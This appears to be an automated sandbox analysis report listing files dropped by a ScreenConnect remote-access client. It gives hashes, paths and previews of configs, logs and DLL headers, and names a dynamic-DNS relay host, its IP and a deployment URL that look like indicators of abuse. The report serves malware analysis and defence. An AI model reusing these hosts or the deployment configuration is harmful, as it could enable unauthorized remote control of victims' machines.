                                                                                                                                                                                                                                                      Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\app.config

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2089
                                                                                                                                                                                                                                                      Entropy (8bit):4.688974504275539
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:OhMOdH55AfdH85AfdHfh/dH8h/dHmh/dHH/dHS/dH0/dHjdH6dH/dHAdHKdH3dHK:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHY
                                                                                                                                                                                                                                                      MD5:6E88FAD97F4CFC0339D8D71F55326EDF
                                                                                                                                                                                                                                                      SHA1:7FE09E6D87B7CA210C8D7AFA9D69380528A6D4F2
                                                                                                                                                                                                                                                      SHA-256:F09E170444003576AD24985C8B4873E7CBDC18863A4943A1FDEB0E3249812806
                                                                                                                                                                                                                                                      SHA-512:023175F24C652E73946A01DB84579BAF00D4447AFA01CD2EA09820964DCA10D9C24C7DD7F37109A836996477B4C9804B75830C95A790B5598564395272F98A15
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\fy1ftoo0.newcfg

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):562
                                                                                                                                                                                                                                                      Entropy (8bit):5.070220378377067
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOKTQCDmO/vXbAa3xT:2dL9hK6E46YPoXVvH
                                                                                                                                                                                                                                                      MD5:ACEA838653B74CFB402FC34FFDE3EEE5
                                                                                                                                                                                                                                                      SHA1:53972E41BBD01D64CF5FF39B18A98931AB73321F
                                                                                                                                                                                                                                                      SHA-256:2F1FFCDA60109D0274AC5D5AE0E655E569D8B6D916280FBDD96DB7C3F482D6C3
                                                                                                                                                                                                                                                      SHA-512:BCA06DBBF78F78EE6FA37A8C26492B6596A878DF4DABFFAFFA7AC07E3EEFECDE9619A033D609198F8C3420F69840DC4329359403A34EC0CA64FF929471AB19C4
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>kjh231a.zapto.org=79.110.49.185-25%2f10%2f2024%2017%3a29%3a52</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\user.config (copy)

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):562
                                                                                                                                                                                                                                                      Entropy (8bit):5.070220378377067
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOKTQCDmO/vXbAa3xT:2dL9hK6E46YPoXVvH
                                                                                                                                                                                                                                                      MD5:ACEA838653B74CFB402FC34FFDE3EEE5
                                                                                                                                                                                                                                                      SHA1:53972E41BBD01D64CF5FF39B18A98931AB73321F
                                                                                                                                                                                                                                                      SHA-256:2F1FFCDA60109D0274AC5D5AE0E655E569D8B6D916280FBDD96DB7C3F482D6C3
                                                                                                                                                                                                                                                      SHA-512:BCA06DBBF78F78EE6FA37A8C26492B6596A878DF4DABFFAFFA7AC07E3EEFECDE9619A033D609198F8C3420F69840DC4329359403A34EC0CA64FF929471AB19C4
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>kjh231a.zapto.org=79.110.49.185-25%2f10%2f2024%2017%3a29%3a52</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea\ScreenConnect.ClientService.dll

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):68096
                                                                                                                                                                                                                                                      Entropy (8bit):6.069003835678311
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:vA0ZscQ5V6TsQqoSDih6+39QFVIl1LJhb8gF:o0Zy3IUOQFVQLJF
                                                                                                                                                                                                                                                      MD5:47C0BF8CC60128C530A930637822EA78
                                                                                                                                                                                                                                                      SHA1:6FBAF1C36AF7DFCA4B4970A9F71C1DCD8B7A57F9
                                                                                                                                                                                                                                                      SHA-256:EA71F7DCBE7E754EEF4ED40A931EDA12FEF7063B173A5B1D5095F683B254504C
                                                                                                                                                                                                                                                      SHA-512:D2CBF3BCC53D0D340984617867F22CB43CE5A336B7B844E2F339B308FF28C955F5F3C7217C5ECDFE509B45DBD519BD733C3C9B9C6B8ABA945B8E6A288B495B17
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....k............" ..0.............. ... ...@....... ....................................@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1373
                                                                                                                                                                                                                                                      Entropy (8bit):5.369201792577388
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:ML9E4KQ71qE4GIs0E4KaXE4qpAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoM:MxHKQ71qHGIs0HKEHmAHKKkKYHKGSI65
                                                                                                                                                                                                                                                      MD5:1BF0A215F1599E3CEC10004DF6F37304
                                                                                                                                                                                                                                                      SHA1:169E7E91AC3D25D07050284BB9A01CCC20159DE7
                                                                                                                                                                                                                                                      SHA-256:D9D84A2280B6D61D60868F69899C549FA6E4536F83785BD81A62C485C3C40DB9
                                                                                                                                                                                                                                                      SHA-512:68EE38EA384C8C5D9051C59A152367FA5E8F0B08EB48AA0CE16BCE2D2B31003A25CD72A4CF465E6B926155119DAB5775A57B6A6058B9E44C91BCED1ACCB086DB
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dfsvc.exe.log

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                      Size (bytes):1662
                                                                                                                                                                                                                                                      Entropy (8bit):5.368796786510097
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:M1H2HKQ71qHGIs0HKGAHKKkKYHKGSI6oPtHTH+JHvHlu:gWq+wmj0qxqKkKYqGSI6oPtzHIPQ
                                                                                                                                                                                                                                                      MD5:F133699E2DFF871CA4DC666762B5A7FF
                                                                                                                                                                                                                                                      SHA1:185FC7D230FC1F8AFC9FC2CF4899B8FFD21BCC57
                                                                                                                                                                                                                                                      SHA-256:9BA0C7AEE39ACD102F7F44D289F73D94E2FD0FCD6005A767CD63A74848F19FC7
                                                                                                                                                                                                                                                      SHA-512:8140CDCE2B3B92BF901BD143BFC8FB4FE8F9677036631939D30099C7B2BB382F1267A435E1F5C019EFFFF666D7389F77B06610489D73694FA31D16BD04CAF20A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientService.exe.log

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                      File Type:CSV text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):847
                                                                                                                                                                                                                                                      Entropy (8bit):5.345615485833535
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
                                                                                                                                                                                                                                                      MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
                                                                                                                                                                                                                                                      SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
                                                                                                                                                                                                                                                      SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
                                                                                                                                                                                                                                                      SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\76GEJ2UX.log

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (618), with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):14968
                                                                                                                                                                                                                                                      Entropy (8bit):3.818445481196692
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:t6BKaTdrv5yInMSiYkbBBaOy0lITdrv5yInMSiY3lc7d4/p8uBkVNTdrv5yInMSs:s5y8Vkba15y8V1c7KNK5y8VPJLEv
                                                                                                                                                                                                                                                      MD5:24176DE29CA5F8D60E46A1FB6704A1B7
                                                                                                                                                                                                                                                      SHA1:CC01CF3F88C21774CEDC61B219E8244796DCD820
                                                                                                                                                                                                                                                      SHA-256:B3CC224A8FAFD98100EE429B069940F772B8894216181F58B7CF8945D116254D
                                                                                                                                                                                                                                                      SHA-512:689BCEB09B50CA4ACE4CA296E36AEFAF5D20AB2EC7CDA71297A109205891ACCC1964D718954A3B3258013B6C583F9F52F352D2A4D0C48AF24A85A5604330D1D8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..P.L.A.T.F.O.R.M. .V.E.R.S.I.O.N. .I.N.F.O.......W.i.n.d.o.w.s. .......:. .1.0...0...1.9.0.4.5...0. .(.W.i.n.3.2.N.T.).......C.o.m.m.o.n. .L.a.n.g.u.a.g.e. .R.u.n.t.i.m.e. ...:. .4...0...3.0.3.1.9...4.2.0.0.0.......S.y.s.t.e.m...D.e.p.l.o.y.m.e.n.t...d.l.l. .....:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......c.l.r...d.l.l. .......:. .4...8...4.5.1.5...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.d.l.l...d.l.l. .......:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.s.h.i.m...d.l.l. .......:. .1.0...0...1.9.0.4.1...3.0.0.0.0. .(.W.i.n.B.u.i.l.d...1.6.0.1.0.1...0.8.0.0.).........S.O.U.R.C.E.S.......D.e.p.l.o.y.m.e.n.t. .u.r.l.......:. .h.t.t.p.s.:././.s.e.c.u.r.e...s.t.a.n.s.u.p...c.o.m./.B.i.n./.S.c.r.e.e.n.C.o.n.n.e.c.t...C.l.i.e.n.t...a.p.p.l.i.c.a.t.i.o.n.?.e.=.S.u.p.p.o.r.t.&.y.=.G.u.e.s.t.&.h.=.k.j.h.2.3.1.a...z.a.p.t.o...o.r.g.&.p.=.8.0.4.1.&.s.=.a.7.e.e.4.b.8.5.-.9.6.f.b.-.4.d.9.a.-.b.4.1.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Deployment\1A8JLAL6.KO1\RZBMYN0L.REL.application

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63849), with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):118229
                                                                                                                                                                                                                                                      Entropy (8bit):5.585370839513735
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3072:r7N8cT51/FXvMVNWfCXq9ymfm2o9HuzhJOvP:r6cfiVIBmt8vOvP
                                                                                                                                                                                                                                                      MD5:14CBFC8E1EE96D3503274F68DB7280B9
                                                                                                                                                                                                                                                      SHA1:964378CACB140A0771934E0D4B6EEEB18EE17B99
                                                                                                                                                                                                                                                      SHA-256:490F27B351F34197BEA76860091B7EBAB90F8427BD79C95889D2A12222C5CC00
                                                                                                                                                                                                                                                      SHA-512:410605A4400CA3A5C3F90E998755B5D76013E2314990A51F6F08150E8CC370FB8EC14F3F2B3D180B61322489D7F2672C0AB70F9EC7E4A6CE1566BBAE77A6AE2E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.3.8936" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tru

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Client.dll

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):197120
                                                                                                                                                                                                                                                      Entropy (8bit):6.584712994459805
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3072:mxGtNaldxI5KY9h12MMusqVFJRJcyzvfquFzDvJXYyB:1tNalc5fr12MbPJY8quFGy
                                                                                                                                                                                                                                                      MD5:4D94014D41DE954AEE952C1B930BA395
                                                                                                                                                                                                                                                      SHA1:35A776D4B569C5367F61A68A577CE92086E682E2
                                                                                                                                                                                                                                                      SHA-256:AD8FC048CE7A61C1AF0428B7B3989163A215A9378417CAC6FBF232D0538405C3
                                                                                                                                                                                                                                                      SHA-512:0ACA355B24FAF86B6C321E88321EFF542F277331745010C3A495AAE6F2F123E518284CB7445F78A83BCE3A61BDFFD1AA3FC082E7DC854218B5D7AF95478414F8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5............" ..0.................. ... ....... .......................`......].....@.................................-...O.... ..|....................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...|.... ......................@..@.reloc.......@......................@..B................a.......H...........(............^................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Client.dll.genman

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1039
                                                                                                                                                                                                                                                      Entropy (8bit):5.154101033983839
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:MMHdF4XZ8i9o9olxbv5NEgVkP0AJR7vNxW57FpS+iENg49vNxW5NgMCNg49vNxWO:JdFYZ8h9onRigeP0AKvSkcyMwcVSkTo
                                                                                                                                                                                                                                                      MD5:CD5FD6DC905D01654E81EAD73F6CE116
                                                                                                                                                                                                                                                      SHA1:9A3ED5183F323F33C37755B90B45D401D45AC46C
                                                                                                                                                                                                                                                      SHA-256:51F959457A28D492E123B6B2982865716E8A811CF43DE856033C24CE34C0B187
                                                                                                                                                                                                                                                      SHA-512:25CA0DBBC602C6B61ACA7DA840A2353FD8C5C7FB3B311544DDCC3B1936B3A0F72A93D32E38093AB8B30935211EB4D260EC766EA5C9FBD90D50740EACA54BC052
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependent

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.ClientService.dll

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):68096
                                                                                                                                                                                                                                                      Entropy (8bit):6.069003835678311
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:vA0ZscQ5V6TsQqoSDih6+39QFVIl1LJhb8gF:o0Zy3IUOQFVQLJF
                                                                                                                                                                                                                                                      MD5:47C0BF8CC60128C530A930637822EA78
                                                                                                                                                                                                                                                      SHA1:6FBAF1C36AF7DFCA4B4970A9F71C1DCD8B7A57F9
                                                                                                                                                                                                                                                      SHA-256:EA71F7DCBE7E754EEF4ED40A931EDA12FEF7063B173A5B1D5095F683B254504C
